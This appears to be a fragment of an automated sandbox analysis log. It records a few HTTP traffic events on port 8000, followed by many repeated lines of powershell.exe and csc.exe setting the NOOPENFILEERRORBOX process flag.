Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49765

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
